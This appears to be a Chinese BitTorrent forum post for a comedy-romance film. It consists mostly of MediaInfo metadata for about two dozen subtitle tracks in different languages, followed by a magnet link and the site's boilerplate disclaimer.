  759. Title                                    : Finnish

  760. Language                                 : Finnish

  761. Default                                  : No

  762. Forced                                   : No


  763. Text #10

  764. ID                                       : 41

  765. Format                                   : UTF-8

  766. Codec ID                                 : S_TEXT/UTF8

  767. Codec ID/Info                            : UTF-8 Plain Text

  768. Duration                                 : 1 h 27 min

  769. Bit rate                                 : 75 b/s

  770. Count of elements                        : 1524

  771. Stream size                              : 48.6 KiB (0%)

  772. Title                                    : French

  773. Language                                 : French

  774. Default                                  : No

  775. Forced                                   : No


  776. Text #11

  777. ID                                       : 42

  778. Format                                   : UTF-8

  779. Codec ID                                 : S_TEXT/UTF8

  780. Codec ID/Info                            : UTF-8 Plain Text

  781. Duration                                 : 1 h 27 min

  782. Bit rate                                 : 80 b/s

  783. Count of elements                        : 1471

  784. Stream size                              : 51.8 KiB (0%)

  785. Title                                    : German

  786. Language                                 : German

  787. Default                                  : No

  788. Forced                                   : No


  789. Text #12

  790. ID                                       : 43

  791. Format                                   : UTF-8

  792. Codec ID                                 : S_TEXT/UTF8

  793. Codec ID/Info                            : UTF-8 Plain Text

  794. Duration                                 : 1 h 27 min

  795. Bit rate                                 : 125 b/s

  796. Count of elements                        : 1594

  797. Stream size                              : 80.0 KiB (0%)

  798. Title                                    : Greek

  799. Language                                 : Greek

  800. Default                                  : No

  801. Forced                                   : No


  802. Text #13

  803. ID                                       : 44

  804. Format                                   : UTF-8

  805. Codec ID                                 : S_TEXT/UTF8

  806. Codec ID/Info                            : UTF-8 Plain Text

  807. Duration                                 : 1 h 27 min

  808. Bit rate                                 : 133 b/s

  809. Count of elements                        : 1586

  810. Stream size                              : 85.2 KiB (0%)

  811. Title                                    : Hebrew

  812. Language                                 : Hebrew

  813. Default                                  : No

  814. Forced                                   : No


  815. Text #14

  816. ID                                       : 45

  817. Format                                   : UTF-8

  818. Codec ID                                 : S_TEXT/UTF8

  819. Codec ID/Info                            : UTF-8 Plain Text

  820. Duration                                 : 1 h 27 min

  821. Bit rate                                 : 78 b/s

  822. Count of elements                        : 1545

  823. Stream size                              : 50.2 KiB (0%)

  824. Title                                    : Hungarian

  825. Language                                 : Hungarian

  826. Default                                  : No

  827. Forced                                   : No


  828. Text #15

  829. ID                                       : 46

  830. Format                                   : UTF-8

  831. Codec ID                                 : S_TEXT/UTF8

  832. Codec ID/Info                            : UTF-8 Plain Text

  833. Duration                                 : 1 h 27 min

  834. Bit rate                                 : 80 b/s

  835. Count of elements                        : 1594

  836. Stream size                              : 51.3 KiB (0%)

  837. Title                                    : Indonesian

  838. Language                                 : Indonesian

  839. Default                                  : No

  840. Forced                                   : No


  841. Text #16

  842. ID                                       : 47

  843. Format                                   : UTF-8

  844. Codec ID                                 : S_TEXT/UTF8

  845. Codec ID/Info                            : UTF-8 Plain Text

  846. Duration                                 : 1 h 27 min

  847. Bit rate                                 : 77 b/s

  848. Count of elements                        : 1562

  849. Stream size                              : 49.5 KiB (0%)

  850. Title                                    : Italian

  851. Language                                 : Italian

  852. Default                                  : No

  853. Forced                                   : No


  854. Text #17

  855. ID                                       : 48

  856. Format                                   : UTF-8

  857. Codec ID                                 : S_TEXT/UTF8

  858. Codec ID/Info                            : UTF-8 Plain Text

  859. Duration                                 : 1 h 27 min

  860. Bit rate                                 : 86 b/s

  861. Count of elements                        : 1663

  862. Stream size                              : 55.2 KiB (0%)

  863. Title                                    : Japanese

  864. Language                                 : Japanese

  865. Default                                  : No

  866. Forced                                   : No


  867. Text #18

  868. ID                                       : 49

  869. Format                                   : UTF-8

  870. Codec ID                                 : S_TEXT/UTF8

  871. Codec ID/Info                            : UTF-8 Plain Text

  872. Duration                                 : 1 h 27 min

  873. Bit rate                                 : 102 b/s

  874. Count of elements                        : 1620

  875. Stream size                              : 65.6 KiB (0%)

  876. Title                                    : Korean

  877. Language                                 : Korean

  878. Default                                  : No

  879. Forced                                   : No


  880. Text #19

  881. ID                                       : 50

  882. Format                                   : UTF-8

  883. Codec ID                                 : S_TEXT/UTF8

  884. Codec ID/Info                            : UTF-8 Plain Text

  885. Duration                                 : 1 h 27 min

  886. Bit rate                                 : 79 b/s

  887. Count of elements                        : 1595

  888. Stream size                              : 50.9 KiB (0%)

  889. Title                                    : Malay

  890. Language                                 : Malay

  891. Default                                  : No

  892. Forced                                   : No


  893. Text #20

  894. ID                                       : 51

  895. Format                                   : UTF-8

  896. Codec ID                                 : S_TEXT/UTF8

  897. Codec ID/Info                            : UTF-8 Plain Text

  898. Duration                                 : 1 h 27 min

  899. Bit rate                                 : 74 b/s

  900. Count of elements                        : 1416

  901. Stream size                              : 47.7 KiB (0%)

  902. Title                                    : Norwegian Bokmal

  903. Language                                 : Norwegian Bokmal

  904. Default                                  : No

  905. Forced                                   : No


  906. Text #21

  907. ID                                       : 52

  908. Format                                   : UTF-8

  909. Codec ID                                 : S_TEXT/UTF8

  910. Codec ID/Info                            : UTF-8 Plain Text

  911. Duration                                 : 1 h 27 min

  912. Bit rate                                 : 69 b/s

  913. Count of elements                        : 1534

  914. Stream size                              : 44.3 KiB (0%)

  915. Title                                    : Polish

  916. Language                                 : Polish

  917. Default                                  : No

  918. Forced                                   : No


  919. Text #22

  920. ID                                       : 53

  921. Format                                   : UTF-8

  922. Codec ID                                 : S_TEXT/UTF8

  923. Codec ID/Info                            : UTF-8 Plain Text

  924. Duration                                 : 1 h 27 min

  925. Bit rate                                 : 78 b/s

  926. Count of elements                        : 1553

  927. Stream size                              : 50.4 KiB (0%)

  928. Title                                    : Portuguese

  929. Language                                 : Portuguese

  930. Default                                  : No

  931. Forced                                   : No


  932. Text #23

  933. ID                                       : 54

  934. Format                                   : UTF-8

  935. Codec ID                                 : S_TEXT/UTF8

  936. Codec ID/Info                            : UTF-8 Plain Text

  937. Duration                                 : 1 h 27 min

  938. Bit rate                                 : 80 b/s

  939. Count of elements                        : 1550

  940. Stream size                              : 51.5 KiB (0%)

  941. Title                                    : Brazilian Portuguese

  942. Language                                 : Portuguese

  943. Default                                  : No

  944. Forced                                   : No


  945. Text #24

  946. ID                                       : 55

  947. Format                                   : UTF-8

  948. Codec ID                                 : S_TEXT/UTF8

  949. Codec ID/Info                            : UTF-8 Plain Text

  950. Duration                                 : 1 h 27 min

  951. Bit rate                                 : 88 b/s

  952. Count of elements                        : 1514

  953. Stream size                              : 56.8 KiB (0%)

  954. Title                                    : Romanian

  955. Language                                 : Romanian

  956. Default                                  : No

  957. Forced                                   : No


  958. Text #25

  959. ID                                       : 56

  960. Format                                   : UTF-8

  961. Codec ID                                 : S_TEXT/UTF8

  962. Codec ID/Info                            : UTF-8 Plain Text

  963. Duration                                 : 1 h 27 min

  964. Bit rate                                 : 124 b/s

  965. Count of elements                        : 1567

  966. Stream size                              : 79.8 KiB (0%)

  967. Title                                    : Russian

  968. Language                                 : Russian

  969. Default                                  : No

  970. Forced                                   : No


  971. Text #26

  972. ID                                       : 57

  973. Format                                   : UTF-8

  974. Codec ID                                 : S_TEXT/UTF8

  975. Codec ID/Info                            : UTF-8 Plain Text

  976. Duration                                 : 1 h 27 min

  977. Bit rate                                 : 77 b/s

  978. Count of elements                        : 1542

  979. Stream size                              : 49.4 KiB (0%)

  980. Title                                    : Spanish

  981. Language                                 : Spanish

  982. Default                                  : No

  983. Forced                                   : No


  984. Text #27

  985. ID                                       : 58

  986. Format                                   : UTF-8

  987. Codec ID                                 : S_TEXT/UTF8

  988. Codec ID/Info                            : UTF-8 Plain Text

  989. Duration                                 : 1 h 27 min

  990. Bit rate                                 : 76 b/s

  991. Count of elements                        : 1548

  992. Stream size                              : 48.8 KiB (0%)

  993. Title                                    : European Spanish

  994. Language                                 : Spanish

  995. Default                                  : No

  996. Forced                                   : No


  997. Text #28

  998. ID                                       : 59

  999. Format                                   : UTF-8

  1000. Codec ID                                 : S_TEXT/UTF8

  1001. Codec ID/Info                            : UTF-8 Plain Text

  1002. Duration                                 : 1 h 27 min

  1003. Bit rate                                 : 80 b/s

  1004. Count of elements                        : 1544

  1005. Stream size                              : 51.3 KiB (0%)

  1006. Title                                    : Swedish

  1007. Language                                 : Swedish

  1008. Default                                  : No

  1009. Forced                                   : No


  1010. Text #29

  1011. ID                                       : 60

  1012. Format                                   : UTF-8

  1013. Codec ID                                 : S_TEXT/UTF8

  1014. Codec ID/Info                            : UTF-8 Plain Text

  1015. Duration                                 : 1 h 27 min

  1016. Bit rate                                 : 224 b/s

  1017. Count of elements                        : 1599

  1018. Stream size                              : 144 KiB (0%)

  1019. Title                                    : Thai

  1020. Language                                 : Thai

  1021. Default                                  : No

  1022. Forced                                   : No


  1023. Text #30

  1024. ID                                       : 61

  1025. Format                                   : UTF-8

  1026. Codec ID                                 : S_TEXT/UTF8

  1027. Codec ID/Info                            : UTF-8 Plain Text

  1028. Duration                                 : 1 h 27 min

  1029. Bit rate                                 : 78 b/s

  1030. Count of elements                        : 1540

  1031. Stream size                              : 50.2 KiB (0%)

  1032. Title                                    : Turkish

  1033. Language                                 : Turkish

  1034. Default                                  : No

  1035. Forced                                   : No


  1036. Text #31

  1037. ID                                       : 62

  1038. Format                                   : UTF-8

  1039. Codec ID                                 : S_TEXT/UTF8

  1040. Codec ID/Info                            : UTF-8 Plain Text

  1041. Duration                                 : 1 h 27 min

  1042. Bit rate                                 : 124 b/s

  1043. Count of elements                        : 1576

  1044. Stream size                              : 79.8 KiB (0%)

  1045. Title                                    : Ukrainian

  1046. Language                                 : Ukrainian

  1047. Default                                  : No

  1048. Forced                                   : No


  1049. Text #32

  1050. ID                                       : 63

  1051. Format                                   : UTF-8

  1052. Codec ID                                 : S_TEXT/UTF8

  1053. Codec ID/Info                            : UTF-8 Plain Text

  1054. Duration                                 : 1 h 27 min

  1055. Bit rate                                 : 108 b/s

  1056. Count of elements                        : 1590

  1057. Stream size                              : 69.5 KiB (0%)

  1058. Title                                    : Vietnamese

  1059. Language                                 : Vietnamese

  1060. Default                                  : No

  1061. Forced                                   : No



TAGS 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:4A6E984E12B4D4506434C3979F019A8F35C23969
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回